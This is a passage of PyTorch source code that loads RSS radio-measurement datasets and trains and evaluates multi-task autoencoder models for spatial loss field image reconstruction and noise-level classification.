test_denoise_RSS = (test_denoise_RSS - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS = test_denoise_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img = testing_data['slf_img'][idx]
test_slf_img = test_slf_img.reshape(-1, self.args.K0*self.args.K1)
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab = testing_data['ab_norm'][idx]
test_input_RSS = torch.from_numpy(test_input_RSS).float()
test_denoise_RSS = torch.from_numpy(test_denoise_RSS).float()
test_slf_img = torch.from_numpy(test_slf_img).float()
test_ab = torch.from_numpy(test_ab).float()
test_noise_class = torch.from_numpy(test_noise_class).long()
Test_Dataset = TensorDataset(test_input_RSS, test_denoise_RSS, test_slf_img, test_ab, test_noise_class)
return Test_Dataset
def load_testing_img1(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data for image 1
testing_data1 = sio.loadmat('./data/testing_data_image1.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS1 = testing_data1['RSS']
test_input_RSS1 = (test_input_RSS1 - RSS_min) / (RSS_max - RSS_min)
test_input_RSS1 = test_input_RSS1.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS1 = testing_data1['RSS_denoise']
test_denoise_RSS1 = (test_denoise_RSS1 - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS1 = test_denoise_RSS1.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img1 = testing_data1['slf_img']
test_slf_img1 = test_slf_img1.reshape(1, self.args.K0*self.args.K1)
# SLF image (shape: [num_sample, K[0]*K[1]])
test_slf_img1 = np.tile(test_slf_img1, (test_input_RSS1.shape[0], 1))
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab1 = testing_data1['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_level1 = testing_data1['sig_epsilon_class']
test_noise_level1 = np.squeeze(test_noise_level1)
if noise_level == 'all':
pass
elif noise_level == 'low':
test_input_RSS1 = test_input_RSS1[:500]
test_denoise_RSS1 = test_denoise_RSS1[:500]
test_slf_img1 = test_slf_img1[:500]
test_ab1 = test_ab1[:500]
test_noise_level1 = test_noise_level1[:500]
elif noise_level == 'mid':
test_input_RSS1 = test_input_RSS1[500:1000]
test_denoise_RSS1 = test_denoise_RSS1[500:1000]
test_slf_img1 = test_slf_img1[500:1000]
test_ab1 = test_ab1[500:1000]
test_noise_level1 = test_noise_level1[500:1000]
elif noise_level == 'high':
test_input_RSS1 = test_input_RSS1[1000:]
test_denoise_RSS1 = test_denoise_RSS1[1000:]
test_slf_img1 = test_slf_img1[1000:]
test_ab1 = test_ab1[1000:]
test_noise_level1 = test_noise_level1[1000:]
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_input_RSS1 = torch.from_numpy(test_input_RSS1).float()
test_denoise_RSS1 = torch.from_numpy(test_denoise_RSS1).float()
test_slf_img1 = torch.from_numpy(test_slf_img1).float()
test_ab1 = torch.from_numpy(test_ab1).float()
test_noise_level1 = torch.from_numpy(test_noise_level1).long()
Test_Dataset_1 = TensorDataset(test_input_RSS1, test_denoise_RSS1, test_slf_img1, test_ab1, test_noise_level1)
return Test_Dataset_1
def load_testing_img2(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data for image 2
testing_data2 = sio.loadmat('./data/testing_data_image2.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS2 = testing_data2['RSS']
test_input_RSS2 = (test_input_RSS2 - RSS_min) / (RSS_max - RSS_min)
test_input_RSS2 = test_input_RSS2.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS2 = testing_data2['RSS_denoise']
test_denoise_RSS2 = (test_denoise_RSS2 - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS2 = test_denoise_RSS2.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img2 = testing_data2['slf_img']
test_slf_img2 = test_slf_img2.reshape(1, self.args.K0 * self.args.K1)
# SLF image (shape: [num_sample, K[0]*K[1]])
test_slf_img2 = np.tile(test_slf_img2, (test_input_RSS2.shape[0], 1))
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab2 = testing_data2['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_level2 = testing_data2['sig_epsilon_class']
test_noise_level2 = np.squeeze(test_noise_level2)
if noise_level == 'all':
pass
elif noise_level == 'low':
test_input_RSS2 = test_input_RSS2[:500]
test_denoise_RSS2 = test_denoise_RSS2[:500]
test_slf_img2 = test_slf_img2[:500]
test_ab2 = test_ab2[:500]
test_noise_level2 = test_noise_level2[:500]
elif noise_level == 'mid':
test_input_RSS2 = test_input_RSS2[500:1000]
test_denoise_RSS2 = test_denoise_RSS2[500:1000]
test_slf_img2 = test_slf_img2[500:1000]
test_ab2 = test_ab2[500:1000]
test_noise_level2 = test_noise_level2[500:1000]
elif noise_level == 'high':
test_input_RSS2 = test_input_RSS2[1000:]
test_denoise_RSS2 = test_denoise_RSS2[1000:]
test_slf_img2 = test_slf_img2[1000:]
test_ab2 = test_ab2[1000:]
test_noise_level2 = test_noise_level2[1000:]
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_input_RSS2 = torch.from_numpy(test_input_RSS2).float()
test_denoise_RSS2 = torch.from_numpy(test_denoise_RSS2).float()
test_slf_img2 = torch.from_numpy(test_slf_img2).float()
test_ab2 = torch.from_numpy(test_ab2).float()
test_noise_level2 = torch.from_numpy(test_noise_level2).long()
Test_Dataset_2 = TensorDataset(test_input_RSS2, test_denoise_RSS2, test_slf_img2, test_ab2, test_noise_level2)
return Test_Dataset_2
def train(self, model, train_loader, optimizer, epoch):
model.train()
train_loss = 0 # total loss
train_loss_task0 = 0 # loss for reconstruct RSS
train_loss_task1 = 0 # loss for SLF image estimation
train_loss_task2 = 0 # loss for parameters estimation
train_loss_task3 = 0 # loss for noise level prediction
train_acc = 0 # accuracy for noise level prediction
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(train_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
optimizer.zero_grad()
RSS, SLF, ab, noise_level = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum')/(self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum')/(self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss = self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
train_loss += loss.item()
train_loss_task0 += loss_task0.item()
train_loss_task1 += loss_task1.item()
train_loss_task2 += loss_task2.item()
train_loss_task3 += loss_task3.item()
_, noise_pred = torch.max(noise_level, 1)
acc_task3 = (noise_pred == target_noise_level).sum()
train_acc += acc_task3.item()
loss /= input_RSS.size(0)
loss.backward()
optimizer.step()
if batch_idx % self.args.log_interval == 0:
print(
'Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\tLoss0: {:.6f}\tLoss1: {:.6f}\tLoss2: {:.6f}\tLoss3: {:.6f}\tAcc: {:.6f}'.format(
epoch, batch_idx * len(input_RSS), len(train_loader.dataset),
100. * batch_idx / len(train_loader),
loss.item(),
loss_task0.item() / len(input_RSS), loss_task1.item() / len(input_RSS),
loss_task2.item() / len(input_RSS), loss_task3.item() / len(input_RSS), acc_task3.item() / len(input_RSS)))
train_loss /= len(train_loader.dataset)
train_loss_task0 /= len(train_loader.dataset)
train_loss_task1 /= len(train_loader.dataset)
train_loss_task2 /= len(train_loader.dataset)
train_loss_task3 /= len(train_loader.dataset)
train_acc /= len(train_loader.dataset)
print('====> Epoch: {} Average loss: {:.6f}'.format(epoch, train_loss))
print('====> RSS loss: {:.6f}'.format(train_loss_task0))
print('====> SLF loss: {:.6f}'.format(train_loss_task1))
print('====> ab loss: {:.6f}'.format(train_loss_task2))
print('====> noise level loss: {:.6f}'.format(train_loss_task3))
print('====> noise level Accuracy: {:.4f}'.format(train_acc))
return train_loss, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc
def validate(self, model, val_loader):
model.eval()
val_loss = 0 # total loss
val_rmse_slf = 0 # slf reconstruction loss
val_mae_slf = 0 # slf reconstruction loss
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(val_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
RSS, SLF, ab, noise_level = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum')/(self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum')/(self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss = self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
val_loss += loss.item()
slf_mse = F.mse_loss(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
slf_mae = F.l1_loss(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
val_rmse_slf += slf_mse.item()
val_mae_slf += slf_mae.item()
val_loss /= len(val_loader.dataset)
val_rmse_slf /= len(val_loader.dataset)
val_rmse_slf = np.sqrt(val_rmse_slf)
val_mae_slf /= len(val_loader.dataset)
print('====> Validation set loss: {:.6f}'.format(val_loss))
print('====> Validation set SLF rmse: {:.6f}'.format(val_rmse_slf))
print('====> Validation set SLF mae: {:.6f}'.format(val_mae_slf))
return val_loss, val_rmse_slf, val_mae_slf
def test(self, model, test_loader):
model.eval()
test_loss = 0 # total loss
test_loss_task0 = 0 # loss for reconstruct RSS
test_loss_task1 = 0 # loss for SLF image estimation
test_loss_task2 = 0 # loss for parameters estimation
test_loss_task3 = 0 # loss for noise level prediction
with torch.no_grad():
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
RSS, SLF, ab, noise_level = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss = self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
test_loss += loss.item()
test_loss_task0 += loss_task0.item()
test_loss_task1 += loss_task1.item()
test_loss_task2 += loss_task2.item()
test_loss_task3 += loss_task3.item()
test_loss /= len(test_loader.dataset)
test_loss_task0 /= len(test_loader.dataset)
test_loss_task1 /= len(test_loader.dataset)
test_loss_task2 /= len(test_loader.dataset)
test_loss_task3 /= len(test_loader.dataset)
test_acc = self.test_accuracy(model, test_loader)
print('====> Test set loss: {:.6f}'.format(test_loss))
print('====> Test set RSS loss: {:.6f}'.format(test_loss_task0))
print('====> Test set SLF loss: {:.6f}'.format(test_loss_task1))
print('====> Test set ab loss: {:.6f}'.format(test_loss_task2))
print('====> Test set noise level loss: {:.6f}'.format(test_loss_task3))
print('====> Test set noise level Accuracy: {:.4f}'.format(test_acc))
return test_loss, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc
def train_save(self):
model = MAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
def weights_init(m):
if isinstance(m, torch.nn.Linear) or isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.ConvTranspose2d):
torch.nn.init.xavier_uniform_(m.weight.data)
if m.bias is not None:
torch.nn.init.zeros_(m.bias.data)
model.apply(weights_init)
model = model.to(self.device)
summary(model, input_size=(self.args.batch_size, self.args.N, self.args.P, self.args.P))
train_loader, val_loader, test_loader, test_loader1, test_loader2 = self.load_data()
optimizer = self.get_optimizer(model.parameters())
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', factor=0.25, patience=10, min_lr=1e-5)
train_set = []
val_set = []
test_set = [] # for test set
test_set1 = [] # for test image 1
test_set2 = [] # for test image 2
train_loss_path = self.path + 'train_loss_' + str(self.args.n_epochs) + '.npy'
val_loss_path = self.path + 'val_loss_' + str(self.args.n_epochs) + '.npy'
test_loss_path = self.path + 'test_loss_' + str(self.args.n_epochs) + '.npz'
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
current_val_slf_loss = np.inf
for epoch in range(1, self.args.n_epochs+1):
print("Epoch %d learning rate:%f" % (epoch, optimizer.param_groups[0]['lr']))
train_loss, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc = self.train(model,
train_loader,
optimizer,
epoch)
train_set.append([train_loss, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc])
print('====> Validation Loss for Epoch {:d}'.format(epoch))
val_loss, val_slf_rmse, val_slf_mae = self.validate(model, val_loader)
val_set.append([val_loss, val_slf_rmse, val_slf_mae])
scheduler.step(val_loss)
print('====> Test for Epoch {:d}'.format(epoch))
test_loss, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(model,
test_loader)
test_set.append([test_loss, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
print('====> Test Image1 for Epoch {:d}'.format(epoch))
test_loss, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(model,
test_loader1)
test_set1.append([test_loss, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
print('====> Test Image2 for Epoch {:d}'.format(epoch))
test_loss, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(model,
test_loader2)
test_set2.append([test_loss, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
if epoch % self.args.save_freq == 0:
ckpt_path = self.path + '/model_' + str(epoch) + '.pth'
torch.save(model.state_dict(), ckpt_path)
print('checkpoint{}.pth saved!'.format(epoch))
if val_slf_mae < current_val_slf_loss:
torch.save(model.state_dict(), model_path)
current_val_slf_loss = val_slf_mae
train_loss = np.asarray(train_set).reshape(-1, 6)
val_loss = np.asarray(val_set).reshape(-1, 3)
test_loss = np.asarray(test_set).reshape(-1, 6)
test_loss1 = np.asarray(test_set1).reshape(-1, 6)
test_loss2 = np.asarray(test_set2).reshape(-1, 6)
np.save(train_loss_path, train_loss)
np.save(val_loss_path, val_loss)
np.savez(test_loss_path, test_loss=test_loss, test_loss1=test_loss1, test_loss2=test_loss2)
def test_accuracy(self, model, test_loader):
model.eval()
acc = 0
for i, (input_RSS, *_, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
*_, noise_pred = model(input_RSS) # noise_pred: [batch_size, 3]
noise_pred = noise_pred.detach().cpu().numpy()
noise_pred = np.argmax(noise_pred, axis=1)
labels = target_noise_level.detach().cpu().numpy()
acc += np.sum((noise_pred == labels).astype(int))
acc /= len(test_loader.dataset)
return acc
def test_model(self, noise_level='all'):
    """Evaluate the trained MAE checkpoint on the testing set.

    Loads ``<path>model_<n_epochs>.pth``, runs inference over the test
    loader for the requested *noise_level* ('all', 'low', 'mid', 'high'),
    saves side-by-side target/estimated SLF images per batch, and prints
    SLF RMSE/MAE, ab-parameter RMSE and noise-level accuracy.
    """
    model = MAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
    model = model.to(self.device)
    model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
    model.load_state_dict(torch.load(model_path, map_location=self.device))
    model.eval()
    *_, test_loader, test_loader1, test_loader2 = self.load_data(noise_level)
    # noise_class only tags output image filenames; 0 means all classes.
    noise_class = 0
    if noise_level == 'low':
        noise_class = 1
    elif noise_level == 'mid':
        noise_class = 2
    elif noise_level == 'high':
        noise_class = 3
    slf_rmse = 0
    slf_mae = 0
    ab_rmse = 0
    # Inference only: disable autograd while accumulating test metrics.
    with torch.no_grad():
        for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab,
                        target_noise_level) in enumerate(test_loader):
            input_RSS = input_RSS.to(self.device)
            target_RSS = target_RSS.to(self.device)
            target_SLF = target_SLF.to(self.device)
            target_ab = target_ab.to(self.device)
            RSS, SLF, ab, noise_pred = model(input_RSS)
            # Save up to 8 target SLF images stacked over the estimates.
            n = min(target_RSS.size(0), 8)
            comparison = torch.cat(
                [target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
                 SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
            save_image(comparison.cpu(),
                       self.path + 'reconstruction_SLF_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
                       nrow=n)
            # Accumulate per-pixel sum errors; averaged over the dataset
            # (and square-rooted for RMSE) after the loop.
            slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
            slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
            ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
    slf_rmse /= len(test_loader.dataset)
    slf_rmse = np.sqrt(slf_rmse)
    slf_mae /= len(test_loader.dataset)
    ab_rmse /= len(test_loader.dataset)
    ab_rmse = np.sqrt(ab_rmse)
    noise_acc = self.test_accuracy(model, test_loader)
    print('====> Test for Testing Set:')
    print('====> Noise_level: ' + noise_level)
    print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
    print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
    print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
    print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
    # NOTE(review): the large commented-out duplicate evaluation blocks for
    # test_loader1/test_loader2 (per-image metrics) were removed as dead
    # code; rerun the loop above with those loaders if per-image metrics
    # are needed again.
def load_data_metrics(self, noise_level='all'):
    """Build the metrics test DataLoader for the requested noise level.

    Min/max normalization statistics are computed from the training .mat
    file and applied to the testing samples; samples are filtered to the
    requested noise class ('all', 'low', 'mid' or 'high') before being
    wrapped in a TensorDataset.
    """
    # Training data is loaded only to recover the normalization range.
    training_data = sio.loadmat('./data/training_data.mat')
    noisy_train = training_data['RSS']
    RSS_max = np.amax(noisy_train, axis=0, keepdims=True)
    RSS_min = np.amin(noisy_train, axis=0, keepdims=True)
    clean_train = training_data['RSS_denoise']
    RSS_denoise_max = np.amax(clean_train, axis=0, keepdims=True)
    RSS_denoise_min = np.amin(clean_train, axis=0, keepdims=True)
    # Testing samples carry a per-sample noise class (0, 1 or 2).
    testing_data = sio.loadmat('./data/testing_samples1.mat')
    noise_cls = np.squeeze(testing_data['sig_epsilon_class'])
    class_of = {'low': 0, 'mid': 1, 'high': 2}
    if noise_level == 'all':
        keep = (noise_cls == 0) | (noise_cls == 1) | (noise_cls == 2)
    elif noise_level in class_of:
        keep = noise_cls == class_of[noise_level]
    else:
        raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
    noise_cls = noise_cls[keep]
    # Noisy RSS input, min-max normalized and shaped [num, N, P, P].
    noisy = (testing_data['RSS'][keep] - RSS_min) / (RSS_max - RSS_min)
    noisy = noisy.reshape(-1, self.args.N, self.args.P, self.args.P)
    # Clean RSS (decoder target), same normalization and shape.
    clean = (testing_data['RSS_denoise'][keep] - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
    clean = clean.reshape(-1, self.args.N, self.args.P, self.args.P)
    # SLF image flattened to [num, K0*K1].
    slf = testing_data['slf_img'][keep].reshape(-1, self.args.K0 * self.args.K1)
    # ab_norm = [b_norm, alpha_norm] (shape [num, N+1]).
    ab = testing_data['ab_norm'][keep]
    dataset = TensorDataset(torch.from_numpy(noisy).float(),
                            torch.from_numpy(clean).float(),
                            torch.from_numpy(slf).float(),
                            torch.from_numpy(ab).float(),
                            torch.from_numpy(noise_cls).long())
    test_loader = DataLoader(
        dataset,
        batch_size=self.args.batch_size, shuffle=False, num_workers=2)
    print("Data Loaded for testing metrics!")
    return test_loader
def test_model_ROC(self, noise_level='all'):
    """Evaluate the trained MAE checkpoint and dump SLF predictions.

    Computes SLF RMSE/MAE over the metrics test loader and saves the
    concatenated SLF predictions to ``results/MAE/ROC_data/`` for later
    ROC analysis.
    """
    model = MAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
    model = model.to(self.device)
    model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
    model.load_state_dict(torch.load(model_path, map_location=self.device))
    model.eval()
    test_loader = self.load_data_metrics(noise_level)
    slf_rmse = 0
    slf_mae = 0
    preds = []
    # Inference only: no gradients needed for metric accumulation.
    # (Removed the unused `noise_class` and `labels` bookkeeping from the
    # original — neither was consumed anywhere in this method.)
    with torch.no_grad():
        for input_RSS, _, target_SLF, *_ in test_loader:
            input_RSS = input_RSS.to(self.device)
            target_SLF = target_SLF.to(self.device)
            _, SLF, *_ = model(input_RSS)
            # Per-pixel sum errors, averaged over the dataset below.
            slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
            slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
            preds.append(SLF.cpu().numpy())
    slf_rmse /= len(test_loader.dataset)
    slf_rmse = np.sqrt(slf_rmse)
    slf_mae /= len(test_loader.dataset)
    print('====> Test for Testing Set:')
    print('====> Noise_level: ' + noise_level)
    print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
    print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
    preds = np.concatenate(preds, axis=0)
    save_path = 'results/MAE/ROC_data/mae_preds_' + noise_level + '.npy'
    # Create the output tree up front so np.save cannot fail on a missing
    # results/MAE/ROC_data/ directory.
    os.makedirs(os.path.dirname(save_path), exist_ok=True)
    np.save(save_path, preds)
def estimate(self, noise_level='low'):
    """Export resized SLF estimates as .jpg images for YOLO processing.

    Runs the trained MAE checkpoint over the metrics test loader for a
    single noise level and writes each estimated SLF image, resized to
    320x320 with nearest-neighbor interpolation and scaled to [0, 255],
    to ``<path>YOLO/Origin/images/mae/<noise_level>/im<k>.jpg``.

    Raises:
        NotImplementedError: if *noise_level* is not 'low', 'mid' or 'high'.
    """
    if noise_level not in ('low', 'mid', 'high'):
        raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
    model = MAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
    model = model.to(self.device)
    model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
    model.load_state_dict(torch.load(model_path, map_location=self.device))
    model.eval()
    test_loader = self.load_data_metrics(noise_level)
    path_model = self.path + 'YOLO/Origin/images/mae/' + noise_level + '/'
    if not os.path.exists(path_model):
        os.makedirs(path_model)
    print('====> Test Model with estimation:')
    print('====> Noise Level: ' + noise_level)
    # Inference only: disable autograd while exporting estimates.
    with torch.no_grad():
        for batch_idx, (input_rss, _, target_slf, *_) in enumerate(test_loader):
            input_rss = input_rss.to(self.device)
            _, slf_recon, *_ = model(input_rss)
            slf_recon = slf_recon.cpu().numpy()
            for idx in range(slf_recon.shape[0]):
                estimator_img = slf_recon[idx, :].reshape(self.args.K0, self.args.K1)
                # The optional thresholding step (thr=0.4, binarizing the
                # estimate) was dead commented-out code and is removed;
                # the raw grayscale estimate is exported instead.
                estimator_img = cv2.resize(estimator_img, (320, 320), interpolation=cv2.INTER_NEAREST) * 255
                cv2.imwrite(path_model + 'im' + str(idx + batch_idx * self.args.batch_size + 1) + '.jpg', estimator_img)
    # Removed trailing `cv2.imread(...)` whose result was never used.
# runner for Multi-task Gaussian VAE
class MGVAE_runner():
def __init__(self, args):
self.args = args
cuda_flag = not self.args.no_cuda and torch.cuda.is_available()
self.device = torch.device("cuda" if cuda_flag else "cpu")
torch.manual_seed(self.args.seed)
random.seed(self.args.seed)
self.path = self.args.run + 'MGVAE/'
if not os.path.exists(self.path):
os.makedirs(self.path)
def get_optimizer(self, parameters):
if self.args.optimizer == 'Adam':
return optim.Adam(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay, betas=(0.9, 0.999), eps=1e-7)
elif self.args.optimizer == 'RMSProp':
return optim.RMSprop(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay)
elif self.args.optimizer == 'SGD':
return optim.SGD(parameters, lr=self.args.lr, momentum=0.9)
else:
raise NotImplementedError('Optimizer {} not understood.'.format(self.args.optimizer))
def load_data(self, noise_level='all'):
dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min = self.load_training_data()
train_size = int(len(dataset) * 0.9)
val_size = int(len(dataset) * 0.1)
dataset_train, dataset_val = random_split(dataset, [train_size, val_size],
generator=torch.Generator().manual_seed(self.args.seed))
dataset_test = self.load_testing_data(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
dataset_test1 = self.load_testing_img1(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
dataset_test2 = self.load_testing_img2(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
train_loader = DataLoader(
dataset_train,
batch_size=self.args.batch_size, shuffle=True, num_workers=2)
val_loader = DataLoader(
dataset_val,
batch_size=self.args.batch_size, shuffle=True, num_workers=2)
test_loader = DataLoader(
dataset_test,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
test_loader1 = DataLoader(
dataset_test1,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
test_loader2 = DataLoader(
dataset_test2,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
print("Data Loaded!")
return train_loader, val_loader, test_loader, test_loader1, test_loader2
def load_training_data(self):
    """Load and normalize the training .mat data.

    Returns:
        (TensorDataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min)
        where the dataset yields (noisy RSS, clean RSS, SLF image, ab
        parameters, noise class) and the min/max statistics are reused to
        normalize the test sets with the training-set range.
    """
    mat = sio.loadmat('./data/training_data.mat')
    # Noisy RSS input: min-max normalize, then reshape to [num, N, P, P].
    noisy = mat['RSS']
    RSS_max = np.amax(noisy, axis=0, keepdims=True)
    RSS_min = np.amin(noisy, axis=0, keepdims=True)
    noisy = (noisy - RSS_min) / (RSS_max - RSS_min)
    noisy = noisy.reshape(-1, self.args.N, self.args.P, self.args.P)
    # Clean RSS (decoder target): same treatment with its own range.
    clean = mat['RSS_denoise']
    RSS_denoise_max = np.amax(clean, axis=0, keepdims=True)
    RSS_denoise_min = np.amin(clean, axis=0, keepdims=True)
    clean = (clean - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
    clean = clean.reshape(-1, self.args.N, self.args.P, self.args.P)
    # SLF image flattened to [num, K0*K1].
    slf = mat['slf_img'].reshape(-1, self.args.K0 * self.args.K1)
    # ab_norm = [b_norm, alpha_norm] (shape [num, N+1]).
    ab = mat['ab_norm']
    # Noise level class per sample (0, 1 or 2).
    noise_cls = np.squeeze(mat['sig_epsilon_class'])
    dataset = TensorDataset(torch.from_numpy(noisy).float(),
                            torch.from_numpy(clean).float(),
                            torch.from_numpy(slf).float(),
                            torch.from_numpy(ab).float(),
                            torch.from_numpy(noise_cls).long())
    return dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min
def load_testing_data(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
    """Load the main testing set, normalized with the training-set range.

    Samples are filtered by *noise_level* using the per-sample noise
    class stored in the .mat file (0=low, 1=mid, 2=high).

    Raises:
        NotImplementedError: for an unknown *noise_level*.
    """
    mat = sio.loadmat('./data/testing_data.mat')
    noise_cls = np.squeeze(mat['sig_epsilon_class'])
    class_of = {'low': 0, 'mid': 1, 'high': 2}
    if noise_level == 'all':
        keep = (noise_cls == 0) | (noise_cls == 1) | (noise_cls == 2)
    elif noise_level in class_of:
        keep = noise_cls == class_of[noise_level]
    else:
        raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
    noise_cls = noise_cls[keep]
    # Noisy RSS input, min-max normalized and shaped [num, N, P, P].
    noisy = (mat['RSS'][keep] - RSS_min) / (RSS_max - RSS_min)
    noisy = noisy.reshape(-1, self.args.N, self.args.P, self.args.P)
    # Clean RSS (decoder target), same normalization and shape.
    clean = (mat['RSS_denoise'][keep] - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
